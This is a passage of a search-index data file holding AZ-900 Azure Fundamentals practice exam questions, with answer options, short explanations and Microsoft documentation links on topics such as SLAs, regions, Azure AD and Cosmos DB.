                            Explanation: Network Security Group (NSG) - a fairly basic set of rules that you can apply to both inbound traffic and outbound traffic that lets you specify what sources, destinations and ports are allowed to travel through from outside the virtual network to inside the virtual network. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/security-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-what-is-the-concept-of-availability","title":"Question 39:\u00a0What is the concept of Availability?","text":"
                            • A system must have 100% uptime to be considered available
                            • A system that can scale up and scale down depending on customer demand
                            • The percentage of time a system responds properly to requests, expressed as a percentage over time
                            • A system that has a single point of failure

                            Explanation: Availability - what percentage of time does a system respond properly to requests, expressed as a percentage over time. For more information on region and availability zones see:\u00a0https://docs.microsoft.com/en-us/azure/availability-zones/az-overview. For more information on availability options for virtual machines see:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machines/availability.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-what-is-the-benefit-of-using-powershell-over-cli","title":"Question 40:\u00a0What is the benefit of using Powershell over CLI?","text":"
                            • More powerful commands
                            • Quicker to deploy VMs
                            • Cheaper
                            • No benefit, it's the same

                            Explanation: There is no benefit, only a matter of personal choice. For more info on Azure CLI:\u00a0https://docs.microsoft.com/en-us/cli/azure/what-is-azure-cli?view=azure-cli-latest. For more info on Azure Powershell:\u00a0https://docs.microsoft.com/en-us/powershell/azure/?view=azps-4.5.0

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-how-many-regions-does-azure-have-in-brazil","title":"Question 41:\u00a0How many regions does Azure have in Brazil?","text":"
                            • 2
                            • 0
                            • 1
                            • 4

                            Explanation: There is 1 region in Brazil. For more info:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/geographies/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-what-azure-product-allows-you-to-autoscale-virtual-machines-from-1-to-1000-instances-and-also-provides-load-balancing-services-built-in","title":"Question 42:\u00a0What Azure product allows you to autoscale virtual machines from 1 to 1000 instances, and also provides load balancing services built in?","text":"
                            • Virtual Machine Scale Sets
                            • Azure App Services
                            • Azure Virtual Machines
                            • Application Gateway

                            Explanation: Virtual Machine Scale Sets - these are a set of identical virtual machines (from 1 to 1000 instances) that are designed to auto-scale up and down based on user demand. For more info:\u00a0https://azure.microsoft.com/en-us/services/virtual-machine-scale-sets/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-what-does-it-mean-if-a-service-is-in-general-availability-ga-mode","title":"Question 43: What does it mean if a service is in General Availability (GA) mode?","text":"
                            • Anyone can use the service for any reason
                            • You have to apply to get selected in order to use that service
                            • Anyone can use the service but it must not be for production use
                            • The service has now reached public preview, and Microsoft will provide support for it

                            Explanation: Anyone can use a GA service. It is fully supported and can be used for production. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-each-person-has-their-own-user-id-and-password-to-log-into-azure-but-how-many-subscriptions-can-a-single-account-be-associated-with","title":"Question 44:\u00a0Each person has their own user id and password to log into Azure. But how many subscriptions can a single account be associated with?","text":"
                            • 10
                            • 250 per region
                            • No limit
                            • One

                            Explanation: There is not a limit to the number of subscriptions a single user can be included on.

                            For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/azure-subscription-service-limits

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-what-is-the-azure-sla-for-two-or-more-virtual-machines-in-an-availability-set","title":"Question 45:\u00a0What is the Azure SLA for two or more Virtual Machines in an Availability Set?","text":"
                            • 100%
                            • 99.90%
                            • 99.99%
                            • 99.95%

                            Explanation: 99.95% For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-which-azure-service-is-the-recommended-identity-as-a-service-offering-inside-azure","title":"Question 46:\u00a0Which Azure service is the recommended Identity-as-a-Service offering inside Azure?","text":"
                            • Azure Active Directory (AD)
                            • Azure Portal
                            • Identity and Access Management (IAM)
                            • Azure Front Door

                            Explanation: Azure AD is the identity service designed for web protocols, that you can use for your applications. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-what-is-the-benefit-of-using-a-command-line-tool-like-powershell-or-cli-as-opposed-to-the-azure-portal","title":"Question 47:\u00a0What is the benefit of using a command line tool like Powershell or CLI as opposed to the Azure portal?","text":"
                            • Quicker to deploy VMs
                            • Cheaper
                            • Automation

                            Explanation: The real benefit is automation. Being able to write a script to do something is better than having to do it manually each time. For more info on Azure CLI:\u00a0https://docs.microsoft.com/en-us/cli/azure/what-is-azure-cli?view=azure-cli-latest. For more info on Azure Powershell:\u00a0https://docs.microsoft.com/en-us/powershell/azure/?view=azps-4.5.0

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-what-database-service-is-specifically-designed-to-be-extremely-fast-in-responding-to-requests-for-small-amounts-of-data-called-low-latency","title":"Question 48:\u00a0What database service is specifically designed to be extremely fast in responding to requests for small amounts of data (called low latency)?","text":"
                            • SQL Database
                            • SQL Data Warehouse
                            • Cosmos DB
                            • SQL Server in a VM

                            Explanation: Cosmos DB - extremely low latency (fast) storage designed for smaller pieces of data quickly; SaaS. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cosmos-db/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-if-you-are-a-us-federal-state-local-or-tribal-government-entities-and-their-solution-providers-which-azure-option-should-you-be-looking-to-register-for","title":"Question 49: If you are a US federal, state, local, or tribal government entities and their solution providers, which Azure option should you be looking to register for?","text":"
                            • Azure is not available for government officials
                            • Azure Government
                            • Azure Department of Defence
                            • Azure Public Portal

                            Explanation: Hopefully, it's clear that US Federal, State, Local and Tribal governments can use the US Government portal. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-government/documentation-government-welcome

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-what-is-the-service-level-agreement-for-two-or-more-azure-virtual-machines-that-have-been-manually-placed-into-different-availability-zones-in-the-same-region","title":"Question 50:\u00a0What is the service level agreement for two or more Azure Virtual Machines that have been manually placed into different Availability Zones in the same region?","text":"
                            • 99.95%
                            • 99.90%
                            • 99.99%
                            • 100%

                            Explanation: 99.99%. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-3","title":"Test 3","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-what-is-the-significance-of-the-azure-region-why-is-it-important","title":"Question 1:\u00a0What is the significance of the Azure region? Why is it important?","text":"
                            • You must select a region when creating most resources, and the region is the area of the world where those resources will be physically located.
                            • Once you select a region, you cannot create resources outside of that region. So selecting the right region is an important decision.
                            • Region is just a folder structure in which you organize resources, much like file folders on a computer.
                            • Even though you have to choose a region when creating resources, there's generally no consequence of what you select. You can create a network in one region and then create virtual machines for that network in another region.

                            Explanation: The region is the area of the world where resources get created. You can create resources in any region that you have access to. But there are sometimes restrictions when creating a resource in one region that related resources like networks must also be in the same region for logical reasons. For more info:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/geographies/#overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-true-or-false-through-azure-active-directory-one-can-control-access-to-an-application-but-not-the-resources-of-the-application","title":"Question 2:\u00a0TRUE OR FALSE: Through Azure Active Directory one can control access to an application but not the resources of the application.","text":"
                            • FALSE
                            • TRUE

                            Explanation: Azure AD can control the access of both the apps and the app resources. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-what-is-the-name-of-the-open-source-project-run-by-the-apache-foundation-that-maps-to-the-hdinsight-tools-within-azure","title":"Question 3:\u00a0What is the name of the open source project run by the Apache foundation that maps to the HDInsight tools within Azure?","text":"
                            • Apache Jazz
                            • Apache Cayenne
                            • Apache Jaguar
                            • Apache Hadoop
                            • Explanation: Hadoop is open source home of the HDInsight tools. For more info:\u00a0https://docs.microsoft.com/en-us/azure/hdinsight/hadoop/apache-hadoop-introduction
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-which-tool-within-the-azure-portal-will-make-specific-recommendations-based-on-your-actual-usage-for-how-you-can-improve-your-use-of-azure","title":"Question 4:\u00a0Which tool within the Azure Portal will make specific recommendations based on your actual usage for how you can improve your use of Azure?","text":"
                            • Azure Monitor
                            • Azure Service Health
                            • Azure Dashboard
                            • Azure Advisor

                            Explanation: Azure Advisor - a tool that will analyze your use of Azure and make you specific recommendations based on your usage across availability, security, performance and cost categories. For more info:\u00a0https://docs.microsoft.com/en-us/azure/advisor/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-what-does-it-mean-that-security-is-a-shared-model-in-azure","title":"Question 5: What does it mean that security is a \"shared model\" in Azure?","text":"
                            • Both users and Azure have responsibilities for security.
                            • You must keep your security keys private and ensure it doesn't get out.
                            • Azure takes care of security completely.
                            • Azure takes no responsibility for security.

                            Explanation: The shared security model means that, depending on the application model, you and Azure both have roles in ensuring a secure environment. For more info:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/shared-responsibility

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-what-is-the-name-of-the-collective-set-of-apis-that-provide-machine-learning-and-artificial-intelligence-services-to-your-own-applications-like-voice-recognition-image-tagging-and-chat-bot","title":"Question 6:\u00a0What is the name of the collective set of APIs that provide machine learning and artificial intelligence services to your own applications like voice recognition, image tagging, and chat bot?","text":"
                            • Cognitive Services
                            • Natural Language Service, LUIS
                            • Azure Machine Learning Studio
                            • Azure Batch

                            Explanation: Azure Cognitive Services is the set of Machine Learning and AI API's. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cognitive-services/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-what-happens-if-azure-does-not-meet-its-own-service-level-agreement-guarantee-sla","title":"Question 7:\u00a0What happens if Azure does not meet its own Service Level Agreement guarantee (SLA)?","text":"
                            • The service will be free that month
                            • You will be financially refunded a small amount of your monthly fee
                            • It's not possible. Azure will always meet it's SLA?

                            Explanation: Microsoft offers a refund of 10% or 25% depending on how badly they miss their service guarantee. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-what-software-is-used-to-synchronize-your-on-premises-ad-with-your-azure-ad","title":"Question 8:\u00a0What software is used to synchronize your on premises AD with your Azure AD?","text":"
                            • Azure AD Federation Services
                            • Azure AD Domain Services
                            • LDAP
                            • AD Connect

                            Explanation: AD Connect is used to synchronize your corporate AD with Azure AD. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-azure-ad-connect

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-true-or-false-if-your-feature-is-in-the-general-availability-phase-then-your-feature-will-receive-support-from-all-microsoft-support-channels","title":"Question 9:\u00a0True or false: If your feature is in the General Availability phase, then your feature will receive support from all Microsoft support channels.","text":"
                            • TRUE
                            • FALSE

                            Explanation: This is true. Do not use preview features in production apps. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-true-or-false-if-you-wanted-to-deploy-a-virtual-machine-to-china-you-would-just-choose-the-china-region-from-the-drop-down","title":"Question 10:\u00a0TRUE OR FALSE: If you wanted to deploy a virtual machine to China, you would just choose the China region from the drop down.","text":"
                            • FALSE
                            • TRUE

                            Explanation: Some regions of the world require special contracts with the local provider such as Germany and China. For more info:\u00a0https://docs.microsoft.com/en-us/azure/china/overview-checklist

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-what-is-a-policy-initiative-in-azure","title":"Question 11: What is a policy initiative in Azure?","text":"
                            • A custom designed policy
                            • Requiring all resources in Azure to use tags
                            • The ability to group policies together
                            • Assigning permissions to a role in Azure

                            Explanation: The ability to group policies together. For more info:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/overview#initiative-definition

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-which-database-product-offers-sub-5-millisecond-response-times-as-a-feature","title":"Question 12: Which database product offers \"sub 5 millisecond\" response times as a feature?","text":"
                            • Cosmos DB
                            • SQL Data Warehouse
                            • SQL Server in a VM
                            • Azure SQL Database

                            Explanation: Cosmos DB is low latency, and even offers sub 5-ms response times at some levels. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cosmos-db/introduction

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-which-of-the-following-resources-are-not-considered-compute-resources","title":"Question 13:\u00a0Which of the following resources are not considered Compute resources?","text":"
                            • Function Apps
                            • Azure Batch
                            • Virtual Machines
                            • Virtual Machine Scale Sets
                            • Load Balancer

                            Explanation: A load balancer is a networking product, and does not execute your code. For more info:\u00a0https://docs.microsoft.com/en-us/azure/load-balancer/load-balancer-overview. For more information on compute resources:\u00a0https://azure.microsoft.com/en-us/product-categories/compute/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-with-azure-public-cloud-anyone-with-a-valid-credit-card-can-sign-up-and-get-services-immediately","title":"Question 14:\u00a0With Azure public cloud, anyone with a valid credit card can sign up and get services immediately","text":"
                            • FALSE
                            • TRUE

                            Explanation: Yes, Azure public cloud is open to the public in all countries that Azure supports. For more info:\u00a0https://docs.microsoft.com/en-us/learn/modules/create-an-azure-account/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-which-azure-service-can-be-enabled-to-enable-multi-factor-authentication-for-administrators-but-not-require-it-for-regular-users","title":"Question 15:\u00a0Which Azure service can be enabled to enable Multi-Factor Authentication for administrators but not require it for regular users?","text":"
                            • Azure AD B2B
                            • Advanced Threat Protection
                            • Azure Firewall
                            • Privileged Identity Management

                            Explanation: Privileged Identity Management can be used to ensure privileged users have to jump through additional verification because of their role. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-configure

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-what-is-an-azure-subscription","title":"Question 16: What is an Azure Subscription?","text":"
                            • Each user account is associated with a unique subscription. If you need more than one subscription, you need to create multiple user accounts.
                            • It is the level at which services are billed. All resources created under a subscription are billed to that subscription.

                            Explanation: Subscription is the level at which things get billed. Multiple users can be associated with a subscription at various permission levels. For more info:\u00a0https://docs.microsoft.com/en-us/services-hub/health/azure_sponsored_subscription

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-what-operating-systems-does-an-azure-virtual-machine-support","title":"Question 17:\u00a0What operating systems does an Azure Virtual Machine support?","text":"
                            • Windows, Linux and macOS
                            • macOS
                            • Windows
                            • Linux
                            • Windows and Linux

                            Explanation: Azure Virtual Machines support Windows and Linux. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machines/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-which-azure-management-tool-analyzes-your-usage-of-azure-and-makes-suggestions-specifically-targeted-to-help-you-optimize-your-usage-of-azure-regarding-cost-security-and-performance","title":"Question 18:\u00a0Which Azure management tool analyzes your usage of Azure and makes suggestions specifically targeted to help you optimize your usage of Azure regarding cost, security and performance?","text":"
                            • Azure Service Health
                            • Azure Advisor
                            • Azure Firewall
                            • Azure Mobile App

                            Explanation: Azure Advisor analyzes your specific usage of Azure and makes helpful suggestions on how it can be improved.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-which-feature-within-azure-alerts-you-to-service-issues-that-happen-in-azure-itself-not-specifically-related-to-your-own-resources","title":"Question 19:\u00a0Which feature within Azure alerts you to service issues that happen in Azure itself, not specifically related to your own resources?","text":"
                            • Azure Monitor
                            • Azure Portal Dashboard
                            • Azure Service Health
                            • Azure Security Center

                            Explanation: Azure Service Health - lets you know about any Azure-related service issues including region-wide downtime. For more info:\u00a0https://docs.microsoft.com/en-us/azure/service-health/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-which-two-features-does-virtual-machine-scale-sets-provide-as-part-of-the-core-product-pick-two","title":"Question 20:\u00a0Which two features does Virtual Machine Scale Sets provide as part of the core product? Pick two.","text":"
                            • Content Delivery Network
                            • Firewall
                            • Automatic installation of supporting apps and deployment of custom code
                            • Load balancing between virtual machines
                            • Autoscaling of virtual machines

                            Explanation: VMSS provides autoscale features and has a built in load balancer. You still need to have a way to deploy your code to the new servers, as you do with regular VMs. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machine-scale-sets/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-where-can-you-go-to-see-what-standards-microsoft-is-in-compliance-with","title":"Question 21:\u00a0Where can you go to see what standards Microsoft is in compliance with?","text":"
                            • Azure Service Health
                            • Azure Security Center
                            • Trust Center
                            • Azure Privacy Page

                            Explanation: The list of standards that Azure has been certified to meet is in the Trust Center. For more info:\u00a0https://www.microsoft.com/en-us/trust-center

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-what-does-it-mean-if-a-service-is-in-private-preview-mode","title":"Question 22: What does it mean if a service is in Private Preview mode?","text":"
                            • The service is generally available for use, and Microsoft will provide support for it
                            • Anyone can use the service but it must not be for production use
                            • You have to apply to get selected in order to use that service
                            • Anyone can use the service for any reason

                            Explanation: Private Preview means you have to apply to use a service, and you may or may not be selected. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-what-are-groups-of-subscriptions-called","title":"Question 23: What are groups of subscriptions called?","text":"
                            • Azure Policy
                            • Subscription Groups
                            • ARM Groups
                            • Management Groups

                            Explanation: Subscriptions can be nested and placed into management groups to make managing them easier. For more info:\u00a0https://docs.microsoft.com/en-us/azure/governance/management-groups/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-how-do-you-stop-your-azure-account-from-incurring-costs-above-a-certain-level-without-your-knowledge","title":"Question 24: How do you stop your Azure account from incurring costs above a certain level without your knowledge?","text":"
                            • Switch to Azure Reserved Instances with Hybrid Benefit for VMs
                            • Only use Azure Functions which have a significant free limit
                            • Implement the Azure spending limit in the Account Center
                            • Set up a billing alert to send you an email when it reaches a certain level

                            Explanation: If you don't want to spend over a certain amount, implement a spending limit in the account center. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cost-management-billing/manage/spending-limit

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-how-does-multi-factor-authentication-make-a-system-more-secure","title":"Question 25:\u00a0How does Multi-Factor Authentication make a system more secure?","text":"
                            • It allows the user to log in without a password because they have already previously been validated using a browser cookie
                            • It requires the user to have access to their verified phone in order to log in
                            • It doesn't make it more secure
                            • It is another password that a user has to memorize, making it more secure

                            Explanation: Multi-Factor Authentication (MFA) - the concept of having something additional to a \u201cpassword\u201d that is required to log in; passwords are find-able or guessable; but having your mobile phone on you to receive a phone call, text or run an app to get a code is harder for an unknown hacker to get. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-how-many-hours-are-available-free-when-using-the-azure-b1s-general-purpose-virtual-machines-under-a-azure-free-account-in-the-first-12-months","title":"Question 26:\u00a0How many hours are available free when using the Azure B1S General Purpose Virtual Machines under a Azure free account in the first 12 months?","text":"
                            • 500 hrs
                            • 750 hrs
                            • 300 hrs
                            • Indefinite amount of hrs

                            Explanation: Each Azure free account includes 750 hours free for Azure B1S General Purpose Virtual Machines for the first 12 months. For more info:\u00a0https://azure.microsoft.com/en-us/free/free-account-faq/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-what-is-the-goal-of-a-ddos-attack","title":"Question 27:\u00a0What is the goal of a DDoS attack?","text":"
                            • To extract data from a database
                            • To trick users into giving up personal information
                            • To overwhelm and exhaust application resources
                            • To crack the password from administrator accounts

                            Explanation: DDoS is a type of attack that tries to exhaust application resources. The goal is to affect the application\u2019s availability and its ability to handle legitimate requests. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-true-or-false-azure-powershell-scripts-and-command-line-interface-cli-scripts-are-entirely-compatible-with-each-other","title":"Question 28: True or false: Azure PowerShell scripts and Command Line Interface (CLI) scripts are entirely compatible with each other?","text":"
                            • TRUE
                            • FALSE

                            Explanation: No, PowerShell is it's own language, different than CLI. For more info:\u00a0https://docs.microsoft.com/en-us/powershell/azure/?view=azps-4.5.0

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-for-tax-optimization-which-type-of-expense-is-preferable","title":"Question 29:\u00a0For tax optimization, which type of expense is preferable?","text":"
                            • CapEx
                            • OpEx

                            Explanation: Operating Expenditure is thought to be preferable because you can fully deduct expenses when they are incurred. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/strategy/business-outcomes/fiscal-outcomes

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-what-is-the-recommended-way-within-azure-to-store-secrets-such-as-private-cryptographic-keys","title":"Question 30:\u00a0What is the recommended way within Azure to store secrets such as private cryptographic keys?","text":"
                            • Azure Advanced Threat Protection (ATP)
                            • In an Azure Storage account private blob container
                            • Within the application code
                            • Azure Key Vault

                            Explanation: Azure Key Vault - the modern way to store cryptographic keys, signed certificates and secrets in Azure. For more info:\u00a0https://docs.microsoft.com/en-us/azure/key-vault/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-which-of-the-following-would-be-an-example-of-an-internet-of-things-iot-device","title":"Question 31:\u00a0Which of the following would be an example of an Internet of Things (IoT) device?","text":"
                            • A video game, installed on Windows clients around the world, that keep user scores in the cloud.
                            • A mobile application that is used to watch online video courses
                            • A refrigerator that monitors how much milk you have left and sends you a text message when you are running low
                            • A web application that people use to perform their banking tasks

                            Explanation: An IoT device is not a standard computing device but connects to a network to report data on a regular basis. A web server, a personal computer, or a mobile app is not an IoT device. For more info:\u00a0https://docs.microsoft.com/en-us/azure/iot-fundamentals/iot-introduction

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-deploying-azure-app-services-applications-consists-of-what-two-components-pick-two","title":"Question 32:\u00a0Deploying Azure App Services applications consists of what two components? Pick two.","text":"
                            • Database scripts
                            • Configuration
                            • Managing operating system updates
                            • Packaged code

                            Explanation: Azure App Services, platform as a service, consists of code and configuration. For more info:\u00a0https://docs.microsoft.com/en-us/azure/app-service/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-what-type-of-documents-does-the-microsoft-service-trust-portal-provide","title":"Question 33:\u00a0What type of documents does the Microsoft Service Trust Portal provide?","text":"
                            • Documentation on the individual Azure services and solutions
                            • Specific recommendations about your usage of Azure and ways you can improve
                            • A list of standards that Microsoft follows, pen test results, security assessments, white papers, faqs, and other documents that can be used to show Microsoft's compliance efforts
                            • A tool that helps you manage your compliance to various standards

                            Explanation: A list of standards that Microsoft follows, pen test results, security assessments, white papers, faqs, and other documents that can be used to show Microsoft's compliance efforts. For more info:\u00a0https://servicetrust.microsoft.com/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-which-of-the-following-are-one-of-the-advantages-of-running-your-cloud-in-a-private-cloud","title":"Question 34: Which of the following are one of the advantages of running your cloud in a private cloud?","text":"
                            • Assurance that your code, data and applications are running on isolated hardware, and on an isolated network.
                            • You own the hardware, so you can change private cloud hosting providers easily.
                            • Private cloud is significantly cheaper than the public cloud.

                            Explanation: Private cloud generally means that you are running your code on isolated computing, not mixed in with other companies. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-are-private-public-hybrid-clouds/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-what-advantage-does-an-application-gateway-have-over-a-load-balancer","title":"Question 35:\u00a0What advantage does an Application Gateway have over a Load Balancer?","text":"
                            • Application Gateway is more like an enterprise-grade product. You should not use a load balancer in production.
                            • Application gateway understands the HTTP protocol and can interpret the URL and make decisions based on the URL.
                            • Application Gateway can be scaled so that two, three or more instances of the gateway can support your application.

                            Explanation: Application gateway can make load balancing decisions based on the URL path, while a load balancer can't. For more info:\u00a0https://docs.microsoft.com/en-us/azure/application-gateway/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-if-you-wanted-to-get-an-alert-every-time-a-new-virtual-machine-is-created-where-could-you-create-that","title":"Question 36:\u00a0If you wanted to get an alert every time a new virtual machine is created, where could you create that?","text":"
                            • Azure Monitor
                            • Azure Policy
                            • Subscription settings
                            • Azure Dashboard

                            Explanation: The best place to track events at the resource level is Azure Monitor. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-monitor/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-how-many-minutes-per-month-downtime-is-9999-availability","title":"Question 37:\u00a0How many minutes per month downtime is 99.99% availability?","text":"
                            • 4
                            • 1
                            • 40
                            • 100

                            Explanation: 99.99% is 4 minutes per month of downtime. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/summary/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-what-is-the-service-level-agreement-for-two-or-more-azure-virtual-machines-that-have-been-placed-into-the-same-availability-set-in-the-same-region","title":"Question 38:\u00a0What is the service level agreement for two or more Azure Virtual Machines that have been placed into the same Availability Set in the same region?","text":"
                            • 100%
                            • 99.90%
                            • 99.99%
                            • 99.95%

                            Explanation: 99.95%. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-what-is-the-core-problem-that-you-need-to-solve-in-order-to-have-a-high-availability-application","title":"Question 39:\u00a0What is the core problem that you need to solve in order to have a high-availability application?","text":"
                            • You need to avoid single points of failure
                            • You need to ensure your server has a lot of RAM and a lot of CPUs
                            • You should have a backup copy of your application on standby, ready to be started up when the main application fails.
                            • You need to ensure the capacity of your server exceeds your highest number of expected concurrent users

                            Explanation: You'll want to avoid single points of failure, so that any component that fails does not cause the entire application to fail. For more info:\u00a0https://docs.microsoft.com/en-us/azure/architecture/guide/design-principles/redundancy

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-what-are-resource-groups","title":"Question 40:\u00a0What are resource groups?","text":"
                            • A folder structure in Azure in which you organize resources like databases, virtual machines, virtual networks, or almost any resource
                            • Automatically assigned groups of resources that all have the same type (virtual machine, app service, etc)
                            • Based on the tag assigned to a resource by the deployment script, it is assigned to a group
                            • Within Azure security model, users are organized into groups, and those groups are granted permissions to resources

                            Explanation: Resource Groups - a folder structure in Azure in which you organize resources like databases, virtual machines, virtual networks, or almost any resource. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-portal

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-which-of-the-following-services-would-not-be-considered-infrastructure-as-a-service","title":"Question 41:\u00a0Which of the following services would NOT be considered Infrastructure as a Service?","text":"
                            • Virtual Network Interface Card (NIC)
                            • Azure Functions App
                            • Virtual Machine
                            • Virtual Network

                            Explanation: Functions are small pieces of code that you give to Azure to run for you, and you have no access to the underlying infrastructure. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-functions/

